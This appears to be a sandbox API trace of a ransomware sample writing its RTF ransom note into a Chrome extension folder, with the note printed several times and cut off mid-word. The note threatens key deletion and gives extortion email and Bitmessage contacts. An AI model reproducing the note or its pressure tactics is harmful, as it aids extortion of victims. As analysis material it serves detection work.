fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.332] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.332] CloseHandle (hObject=0x294) returned 1 [0285.332] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\#readme_eman#.rtf")) returned 0xffffffff [0285.332] GetLastError () returned 0x2 [0285.332] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.333] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.333] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 